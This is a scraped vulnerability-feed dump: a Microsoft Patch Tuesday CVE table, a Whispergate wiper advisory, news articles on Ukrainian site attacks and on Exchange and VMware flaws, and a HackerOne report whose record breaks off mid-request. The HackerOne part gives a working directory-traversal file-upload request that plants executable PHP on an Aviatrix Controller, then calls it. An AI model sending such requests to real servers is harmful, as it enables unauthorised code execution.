Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-33781](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33781>) | Active Directory Security Feature Bypass Vulnerability | No | Yes | 8.1 | No \n \n## Windows ESU Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-31183](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31183>) | Windows TCP/IP Driver Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-33757](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33757>) | Windows Security Account Manager Remote Protocol Security Feature Bypass Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-33783](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33783>) | Windows SMB Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-34507](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34507>) | Windows Remote Assistance Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-34457](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34457>) | Windows Remote Access Connection Manager Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34456](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34456>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34527](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34527>) | Windows Print Spooler Remote Code Execution Vulnerability | Yes | Yes | 8.8 | Yes \n[CVE-2021-34497](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34497>) | Windows MSHTML Platform Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-34447](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34447>) | Windows MSHTML Platform Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-33786](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33786>) | Windows LSA Security Feature Bypass Vulnerability | No | No | 8.1 | Yes \n[CVE-2021-33788](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33788>) | Windows LSA Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-33764](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33764>) | Windows Key Distribution Center Information Disclosure Vulnerability | No | No | 5.9 | Yes \n[CVE-2021-34500](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34500>) | Windows Kernel Memory Information Disclosure Vulnerability | No | No | 6.3 | Yes \n[CVE-2021-31979](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31979>) | Windows Kernel Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2021-34514](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34514>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33765](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33765>) | Windows Installer Spoofing Vulnerability | No | No | 6.2 | No \n[CVE-2021-34511](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34511>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34446](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34446>) | Windows HTML Platforms Security Feature Bypass Vulnerability | No | No | 8 | No \n[CVE-2021-34496](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34496>) | Windows GDI Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34498](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34498>) | Windows GDI Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33749](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33749>) | Windows DNS Snap-in Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-33750](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33750>) | Windows DNS Snap-in Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-33752](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33752>) | Windows DNS Snap-in Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-33756](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33756>) | Windows DNS Snap-in Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-34494](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34494>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-33780](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33780>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-33746](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33746>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8 | No \n[CVE-2021-33754](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33754>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8 | No \n[CVE-2021-34442](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34442>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-34444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34444>) | Windows DNS Server Denial of Service Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-34499](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34499>) | Windows DNS Server Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2021-33745](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33745>) | Windows DNS Server Denial of Service Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-34492](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34492>) | Windows Certificate Spoofing Vulnerability | No | Yes | 8.1 | No \n[CVE-2021-33782](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33782>) | Windows Authenticode Spoofing Vulnerability | No | No | 5.5 | No \n[CVE-2021-34504](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34504>) | Windows Address Book Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34516](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34516>) | Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34448](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34448>) | Scripting Engine Memory Corruption Vulnerability | Yes | No | 6.8 | Yes \n[CVE-2021-34441](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34441>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34440>) | GDI+ Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34476](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34476>) | Bowser.sys Denial of Service Vulnerability | No | No | 7.5 | No \n \n## Summary Graphs\n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-13T20:56:26", "type": "rapid7blog", "title": "Patch Tuesday - July 2021", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-31183", "CVE-2021-31196", "CVE-2021-31206", "CVE-2021-31947", "CVE-2021-31961", "CVE-2021-31979", "CVE-2021-31984", "CVE-2021-33740", "CVE-2021-33743", "CVE-2021-33744", "CVE-2021-33745", "CVE-2021-33746", "CVE-2021-33749", "CVE-2021-33750", "CVE-2021-33751", "CVE-2021-33752", "CVE-2021-33753", "CVE-2021-33754", "CVE-2021-33755", "CVE-2021-33756", "CVE-2021-33757", "CVE-2021-33758", "CVE-2021-33759", "CVE-2021-33760", "CVE-2021-33761", "CVE-2021-33763", "CVE-2021-33764", "CVE-2021-33765", "CVE-2021-33766", "CVE-2021-33767", "CVE-2021-33768", "CVE-2021-33771", "CVE-2021-33772", "CVE-2021-33773", "CVE-2021-33774", "CVE-2021-33775", "CVE-2021-33776", "CVE-2021-33777", "CVE-2021-33778", "CVE-2021-33779", "CVE-2021-33780", "CVE-2021-33781", "CVE-2021-33782", "CVE-2021-33783", "CVE-2021-33784", "CVE-2021-33785", "CVE-2021-33786", "CVE-2021-33788", "CVE-2021-34438", "CVE-2021-34439", "CVE-2021-34440", "CVE-2021-34441", "CVE-2021-34442", "CVE-2021-34444", "CVE-2021-34445", "CVE-2021-34446", "CVE-2021-34447", "CVE-2021-34448", "CVE-2021-34449", "CVE-2021-34450", "CVE-2021-34451", "CVE-2021-34452", "CVE-2021-34454", "CVE-2021-34455", "CVE-2021-34456", "CVE-2021-34457", "CVE-2021-34458", "CVE-2021-34459", "CVE-2021-34460", "CVE-2021-34461", "CVE-2021-34462", "CVE-2021-34464", "CVE-2021-34466", "CVE-2021-34467", "CVE-2021-34468", "CVE-2021-34469", "CVE-2021-34470", "CVE-2021-34473", "CVE-2021-34474", "CVE-2021-34476", "CVE-2021-34477", "CVE-2021-34479", "CVE-2021-34488", "CVE-2021-34489", "CVE-2021-34490", "CVE-2021-34491", "CVE-2021-34492", "CVE-2021-34493", "CVE-2021-34494", "CVE-2021-34496", "CVE-2021-34497", "CVE-2021-34498", "CVE-2021-34499", "CVE-2021-34500", "CVE-2021-34501", "CVE-2021-34503", "CVE-2021-34504", "CVE-2021-34507", "CVE-2021-34508", "CVE-2021-34509", "CVE-2021-34510", "CVE-2021-34511", "CVE-2021-34512", "CVE-2021-34513", "CVE-2021-34514", "CVE-2021-34516", "CVE-2021-34517", "CVE-2021-34518", "CVE-2021-34519", "CVE-2021-34520", "CVE-2021-34521", "CVE-2021-34522", "CVE-2021-34523", "CVE-2021-34525", "CVE-2021-34527", "CVE-2021-34528", "CVE-2021-34529"], "modified": "2021-07-13T20:56:26", "id": "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "href": "https://blog.rapid7.com/2021/07/13/patch-tuesday-july-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2022-01-20T15:30:50", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here. A malware attack was carried out on Ukraine government, non-profit, and IT entities with a wiper disguised as ransomware. The threat actor, DEV-0586 targeted government bodies that provide critical executive branch or emergency response functions. The attack using the malware \u201cWhispergate\u201d was preformed in two stages: Stage 1: The malware overwrites the Master Boot Record to display a faked ransom note that requests the payment of a $10,000 ransomware in bitcoin. Stage 2: Stage2.exe is a downloader for second stage malware that corrupts files and is hosted on a Discord channel. After that, the corrupter virus searches for files with hundreds of various extensions, overwrites their contents with a predetermined quantity of 0xCC bytes, and renames each file with an apparently random four-byte extension. This attack is intended to be destructive and designed to render targeted devices inoperable rather than to obtain a ransom. Previously on 13th of January an attack by UNC1151 targeted at least 15 websites belonging to various Ukrainian public institutions were compromised, defaced, and subsequently taken offline. The attackers carried out a supply chain attack by using the vulnerability CVE-2021-32648 in October CMS which is a free content management system. Exploiting this vulnerability, the hackers could send a password reset request for an account in this system and then gain access to it. The attacks are not linked currently but there is a huge possibility that they are carried simultaneously. To mitigate the risk organizations are advised to update October CMS to the latest version and also to monitor the hashes in their system. Actor Details Vulnerability Details Indicators of Compromise (IoCs) Patch Link https://github.com/octobercms/october/security/advisories/GHSA-mxr5-mc97-63rc References https://cert.gov.ua/article/17899 https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ https://securityaffairs.co/wordpress/126782/apt/destructive-malware-campaign-targets-ukraine.html?utm_source=rss&utm_medium=rss&utm_campaign=destructive-malware-campaign-targets-ukraine https://ain.ua/en/2022/01/14/hackers-attack-some-ukrainian-government-websites/", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2022-01-17T14:38:43", "type": "hivepro", "title": "Ukraine government entities targeted by a destructive malware \u201cWhispergate\u201d", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2022-01-17T14:38:43", "id": "HIVEPRO:117C06FAB305E3556D7D341CD4305EA7", "href": "https://www.hivepro.com/ukraine-government-entities-targeted-by-a-destructive-malware-whispergate/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "thn": [{"lastseen": "2022-05-09T12:37:42", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjPrui20H2i9Mmg91xQkaL_C0lzTyQcZJsi6VNWnlu3jBwkpW0bDzeuQDTzZbjO2C96BI6Ofdc_UtTIrnC5OYi0OJEH91V5vlR7zj7Ni4yBSZ8Zt8olInITDcZ3F19m6WHzHnKsC9uGGfMW25PyYm1Fsc9xV3Yx1SemS7VWHdgD9r6KzYS8bO_AO4lO>)\n\nNo fewer than 70 websites operated by the Ukrainian government went offline on Friday for hours in what appears to be a coordinated cyber attack amid heightened tensions with Russia.\n\n\"As a result of a massive cyber attack, the websites of the Ministry of Foreign Affairs and a number of other government agencies are temporarily down,\" Oleg Nikolenko, MFA spokesperson, [tweeted](<https://twitter.com/OlegNikolenko_/status/1481880668195983362>).\n\nThe Security Service of Ukraine, the country's law-enforcement authority, [alluded](<https://ssu.gov.ua/novyny/sbu-rozsliduie-prychetnist-rosiiskykh-spetssluzhb-do-sohodnishnoi-kiberataky-na-orhany-derzhavnoi-vlady-ukrainy>) to a possible Russian involvement, pointing fingers at the hacker groups associated with the Russian secret services while branding the intrusions as a supply chain attack that involved hacking the \"infrastructure of a commercial company that had access to the rights to administer the web resources affected by the attack.\"\n\nPrior to the update from the SSU, the [Ukrainian CERT](<https://cert.gov.ua/article/17899>) claimed that the attacks may have exploited a security vulnerability in Laravel-based October CMS ([CVE-2021-32648](<https://nvd.nist.gov/vuln/detail/CVE-2021-32648>)), which could be abused by an adversary to gain access to an account using a specially crafted request.\n\nThe breach targeted a number of government websites, including those for Ukraine's Cabinet, education, agriculture, emergency, energy, veterans affairs, and environment ministries, among others, 10 websites of which were \"subjected to unauthorized interference.\"\n\nThe security agency, however, stressed that content of the sites was not altered and that no sensitive personal data was stolen.\n\n\"Provocative messages were posted on the main page of the websites,\" the SSU [said](<https://ssu.gov.ua/en/novyny/shchodo-aktak-na-saity-derzhavnykh-orhaniv>). \"The content of the sites was not changed, and, according to preliminary information, no leakage of personal data occurred.\"\n\nThis is far from the first time Russia has set its sights on Ukraine. In December 2015, a nation-state adversary tracked as [Sandworm](<https://malpedia.caad.fkie.fraunhofer.de/actor/sandworm>) [targeted](<https://en.wikipedia.org/wiki/Ukraine_power_grid_hack>) the power grid, resulting in unprecedented blackouts for roughly 230,000 consumers in the nation.\n\nTwo years later, Ukraine was also at the receiving end of the devastating [NotPetya](<https://en.wikipedia.org/wiki/2017_cyberattacks_on_Ukraine>) wiper malware campaign by the Sandworm military hackers that erased confidential data from the computers of banks and energy firms.\n\nThen in November 2021, the SSU [unmasked](<https://thehackernews.com/2021/11/ukraine-identifies-russian-fsb-officers.html>) the real identities of five Russian intelligence officials allegedly involved in over 5,000 cyberattacks attributed to a cyber-espionage group named Gamaredon aimed at public authorities and critical infrastructure located in the country.\n\n\"The purpose of such attacks is to destabilize the internal situation in the country, as well as to sow chaos and disbelief in society,\" the Center for Strategic Communications and Information Security [said](<https://spravdi.gov.ua/ataka-na-uryadovi-sajty-novyj-rozdil-kibervijny-proty-ukrayiny/>), noting the hacks amount to \"psychological pressure and intimidation.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-01-15T06:27:00", "type": "thn", "title": "Massive Cyber Attack Knocks Down Ukrainian Government Websites", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2022-01-15T07:17:34", "id": "THN:03D48DF1CC21CC194B892C2E186448B5", "href": "https://thehackernews.com/2022/01/massive-cyber-attack-knocks-down.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-05-09T12:37:22", "description": "[](<https://thehackernews.com/images/-eENWd0y7Nqc/YS2gk3ld_zI/AAAAAAAADrM/a3ZmVukhB6I2URFn05MTiVcfXQOdpfXNwCLcBGAsYHQ/s0/Microsoft-Exchange.jpg>)\n\nDetails have emerged about a now-patched security vulnerability impacting Microsoft Exchange Server that could be weaponized by an unauthenticated attacker to modify server configurations, thus leading to the disclosure of Personally Identifiable Information (PII).\n\nThe issue, tracked as [CVE-2021-33766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33766>) (CVSS score: 7.3) and coined \"**ProxyToken**,\" was discovered by Le Xuan Tuyen, a researcher at the Information Security Center of Vietnam Posts and Telecommunications Group (VNPT-ISC), and reported through the Zero-Day Initiative (ZDI) program in March 2021.\n\n\"With this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users,\" the ZDI [said](<https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server>) Monday. \"As an illustration of the impact, this can be used to copy all emails addressed to a target and account and forward them to an account controlled by the attacker.\"\n\nMicrosoft addressed the issue as part of its [Patch Tuesday updates](<https://thehackernews.com/2021/07/update-your-windows-pcs-to-patch-117.html>) for July 2021.\n\nThe security shortcoming resides in a feature called Delegated Authentication, which refers to a mechanism whereby the front-end website \u2014 the Outlook web access (OWA) client \u2014 passes authentication requests directly to the back-end when it detects the presence of a SecurityToken cookie.\n\n[](<https://thehackernews.com/images/-HW8Gza4JwgQ/YS2frNWeaII/AAAAAAAADrE/P-fMdCXtnzIYZVzyq2tANkS5LNw3CbYgwCLcBGAsYHQ/s0/Microsoft-Exchange-ProxyToken.jpg>)\n\nHowever, since Exchange has to be specifically configured to use the feature and have the back-end carry out the checks, it leads to a scenario in which the module handling this delegation (\"DelegatedAuthModule\") isn't loaded under default configuration, culminating in a bypass as the back-end fails to authenticate incoming requests based on the SecurityToken cookie.\n\n\"The net result is that requests can sail through, without being subjected to authentication on either the front or back end,\" ZDI's Simon Zuckerbraun explained.\n\nThe disclosure adds to a growing list of Exchange Server vulnerabilities that have come to light this year, including [ProxyLogon](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>), [ProxyOracle](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>), and [ProxyShell](<https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html>), which have been actively exploited by threat actors to take over unpatched servers, deploy malicious web shells and file-encrypting ransomware such as [LockFile](<https://thehackernews.com/2021/08/lockfile-ransomware-bypasses-protection.html>).\n\nTroublingly, in-the-wild exploit attempts abusing ProxyToken have already been recorded as early as August 10, [according](<https://twitter.com/buffaloverflow/status/1432364885804036097>) to NCC Group security researcher Rich Warren, making it imperative that customers move quickly to apply the security updates from Microsoft.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-08-31T03:27:00", "type": "thn", "title": "New Microsoft Exchange 'ProxyToken' Flaw Lets Attackers Reconfigure Mailboxes", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-08-31T06:47:57", "id": "THN:348286B051EE300B46D60D90A16A5CCB", "href": "https://thehackernews.com/2021/08/new-microsoft-exchange-proxytoken-flaw.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-09T12:38:23", "description": "[](<https://thehackernews.com/images/-LL794hm32nE/YG1jF7U5ZaI/AAAAAAAACMU/Q1a-oTSPl_st9NtxIFPobNiHuZtjk9boQCLcBGAsYHQ/s0/vmware.jpg>)\n\nA critical vulnerability in the VMware Carbon Black Cloud Workload appliance could be exploited to bypass authentication and take control of vulnerable systems.\n\nTracked as CVE-2021-21982, the flaw is rated 9.1 out of a maximum of 10 in the CVSS scoring system and affects all versions of the product prior to 1.0.1. \n\nCarbon Black Cloud Workload is a data center security product from VMware that aims to protect critical servers and workloads hosted on vSphere, the company's cloud-computing virtualization platform.\n\n\"A URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication,\" VMware [said](<https://www.vmware.com/security/advisories/VMSA-2021-0005.html>) in its advisory, thereby allowing an adversary with network access to the interface to gain access to the administration API of the appliance.\n\nArmed with the access, a malicious actor can then view and alter [administrative configuration settings](<https://docs.vmware.com/en/VMware-Carbon-Black-Cloud-Workload/1.0/carbonblack_workload/GUID-E2ED3713-315B-4EEE-A3E8-A7A09A011101.html>), the company added.\n\nIn addition to releasing a fix for CVE-2021-21982, VMware has also [addressed](<https://www.vmware.com/security/advisories/VMSA-2021-0004.html>) two separate bugs in its vRealize Operations Manager solution that an attacker with network access to the API could exploit to carry out Server Side Request Forgery ([SSRF](<https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/>)) attacks to steal administrative credentials (CVE-2021-21975) and write files to arbitrary locations on the underlying [photon](<https://github.com/vmware/photon>) operating system (CVE-2021-21983).\n\nThe product is primarily designed to monitor and optimize the performance of the virtual infrastructure and support features such as workload balancing, troubleshooting, and compliance management.\n\nEgor Dimitrenko, a security researcher with Positive Technologies, has been credited with reporting all three flaws.\n\n\"The main risk is that administrator privileges allow attackers to exploit the second vulnerability\u2014CVE-2021-21983 (an arbitrary file write flaw, scored 7.2), which allows executing any commands on the server,\" Dimitrenko [said](<https://www.ptsecurity.com/ww-en/about/news/vmware-fixes-dangerous-vulnerabilities-in-software-for-infrastructure-monitoring-discovered-by-positive-technologies/>). \"The combination of two security flaws makes the situation even more dangerous, as it allows an unauthorized attacker to obtain control over the server and move laterally within the infrastructure.\"\n\nVMware has released patches for vRealize Operations Manager versions 7.0.0, 7.5.0, 8.0.1, 8.1.1, 8.2.0 and 8.3.0. The company has also published workarounds to mitigate the risks associated with the flaws in scenarios where the patch cannot be installed or is not available.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-04-07T08:03:00", "type": "thn", "title": "Critical Auth Bypass Bug Found in VMware Data Center Security Product", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21982", "CVE-2021-21983"], "modified": "2021-04-07T09:38:17", "id": "THN:4640BEB83FE3611B6867B05878F52F0D", "href": "https://thehackernews.com/2021/04/critical-auth-bypass-bug-found-in.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "hackerone": [{"lastseen": "2023-05-23T16:49:14", "bounty": 0.0, "description": "An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.\n\nThe IP has a SSL certificate pointing to Informatica LLC. \n``curl -kvI https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588``\n\nOutput\n\n```\n Server certificate:\n* subject: \u2588\u2588\u2588\u2588\u2588\u2588\n```\n\n\n## Steps To Reproduce\n\nFirst, run this request:\n```\nPOST /v1/backend1 HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\nConnection: close\nContent-Length: 136\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\nCID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/1yv4QQmkj4h4OdmmyT11tkiGf5M.php&data=RCE<?php phpinfo()?>\n\n```\nThe retrieve the content from file ``1yv4QQmkj4h4OdmmyT11tkiGf5M.php``\n\n```\nGET /v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 